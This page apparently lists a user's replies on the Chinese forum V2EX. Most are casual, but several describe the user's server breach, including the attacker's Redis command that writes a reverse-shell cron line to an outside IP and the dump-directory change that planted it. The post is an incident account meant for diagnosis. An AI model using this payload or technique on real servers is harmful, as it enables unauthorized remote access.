V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  bigbigeggs  ›  全部回复第 4 页 / 共 8 页
回复总数  155
1  2  3  4  5  6  7  8  
2021-03-13 13:43:26 +08:00
回复了 db1995 创建的主题 程序员 一气之下写了个图床网站
是上了什么 cdn 么?感觉好快
2021-03-02 20:35:39 +08:00
回复了 nery 创建的主题 程序员 两个项目同时进行,大家能多线程操作吗
之前比较忙的时候,三四个需求。

上午一个需求

下午另外一个需求

晚上在搞一个

慢慢的,就差不多了,其实还好说实话
2021-02-04 20:13:26 +08:00
回复了 ModF 创建的主题 电影 如果让你推荐一部电影
@nashxk 这片子我真没看懂,去年直接在电影院睡着了
2021-02-02 20:50:30 +08:00
回复了 bigbigeggs 创建的主题 酷工作 [内推] 小米内推,欢迎有需要的老哥自取
滴滴
2021-01-25 19:30:22 +08:00
回复了 mightofcode 创建的主题 Java JAVA8 的 Optional 是鸡肋
主要是强制吧,和自己 xx == null 来进行判断。
直接抛异常,他不香么
2021-01-21 19:30:09 +08:00
回复了 kisshere 创建的主题 问与答 现在适合理财小白还能购买的保值抗通胀的财产有哪些
选几个比较好的基金,然后无脑定投即可。
2021-01-12 22:38:32 +08:00
回复了 bigbigeggs 创建的主题 酷工作 [内推] 小米内推,欢迎有需要的老哥自取
@zyfsuzy 年终基本 2-3 个月,看绩效。公积金 12%,额外医保,饭补啥的。
2021-01-05 19:48:29 +08:00
回复了 liujing906qd 创建的主题 Android 请问年底了 3000-5000 这个预算推荐买什么手机呢
安卓小米 11
ios 苹果 mini
2021-01-04 19:53:40 +08:00
回复了 warron 创建的主题 iPhone 早上起来发现手机电量只剩 20%
iphone 你怕啥,直接后台给关掉就好了,权限不给就没问题了
有具体岗位么?后台招么
2020-12-24 12:59:19 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@CodeCodeStudy linux 上定时任务,crontab 每分每秒都执行
2020-12-23 22:11:17 +08:00
回复了 ruoxie 创建的主题 深圳 你们有没有感觉一进地铁站很热,坐标深圳
和你一样。

这是慢性荨麻疹,去过很多北京的三甲医院都没办法,只能提高自己的免疫力。

顺便吐槽下北京的暖气开得太热了,30°都有了。
2020-12-23 19:41:42 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@iloveayu 我也查到他的 qq,姓名了,准备 qq 联系一下。还没有手机号,不知道咋搞
2020-12-23 16:18:51 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@WordTian @yuelang85 确定了,是通过 redis set key,然后 conf 修改了 dump 的文件目录,大意了,唉
2020-12-23 16:17:16 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@k8ser @ztxcccc 感觉报警有点麻烦,晚上研究下他的网址。看看能不能联系上,聊一下。
2020-12-23 16:15:46 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@beichenhpy 是的,root 用户。已经肯定了是从 redis 入侵的,修改了 dump 文件目录
2020-12-23 16:14:42 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
感谢各位大佬的帮助以及建议,昨晚排查到快一点,今天早上又看了看,基本搞懂了。

首先攻击者拿到了我的 redis 端口和密码(全暴露在了公网,具体还不清楚怎么搞到的)

然后往 redis 里面写了一条数据,set x "\n* * * * * bash -i >& /dev/tcp/123.56.128.98/8888 0>&1\n"

然后利用 redis 的 conf 命令 见 RDB 文件的地址替换成了 crontab 的地址 ,日志如下:

![redis]( https://images.cnblogs.com/cnblogs_com/wenbochang/1355057/o_201223080258redis.png)

然后他的这条 bash 命令就写进了 cron 定时任务里面去了。

查了查定时任务的日志,大概在 12.9 日已经入侵了,但不知道入侵者的目的。

![redis]( https://images.cnblogs.com/cnblogs_com/wenbochang/1355057/o_201223080248cron.png)

至今位置,cpu, 内存都一切正常,数据也没有丢失。但是应该数据库,redis,zk 等密码他全部获取到了。

写到了环境变量里面去了,唉。

晚上准备收集一下他的资料,准备和他谈谈,再次感谢各位大佬的帮助了。

可以参考如下两篇文章,写的很详细:

redis 入侵: https://www.cnblogs.com/evan-blog/p/10707087.html

反弹 shell: https://www.cnblogs.com/bonelee/p/11021996.html
2020-12-22 23:25:34 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@WordTian redis 是有对外开放的端口。但是端口不是常用的,并且有设置密码。是有项目在用 redis 塞数据,但 redis 是怎么做到 往 cront 里面写数据的? RDB 文件?
2020-12-22 23:22:52 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@zszhere .ssh 真有一条公钥,吓死我了,不知道什么时候写进去的,感谢老哥提醒。我还得在排查下其他的
2020-12-22 23:07:21 +08:00
回复了 bigbigeggs 创建的主题 问与答 服务器被入侵了,有懂的老铁帮忙看下,万分感谢
@kaneg 应该还有其他定时任务在执行,但就是找不到。也不知道想干嘛
1  2  3  4  5  6  7  8  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2551 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 25ms · UTC 15:21 · PVG 23:21 · LAX 07:21 · JFK 10:21
Developed with CodeLauncher
♥ Do have faith in what you're doing.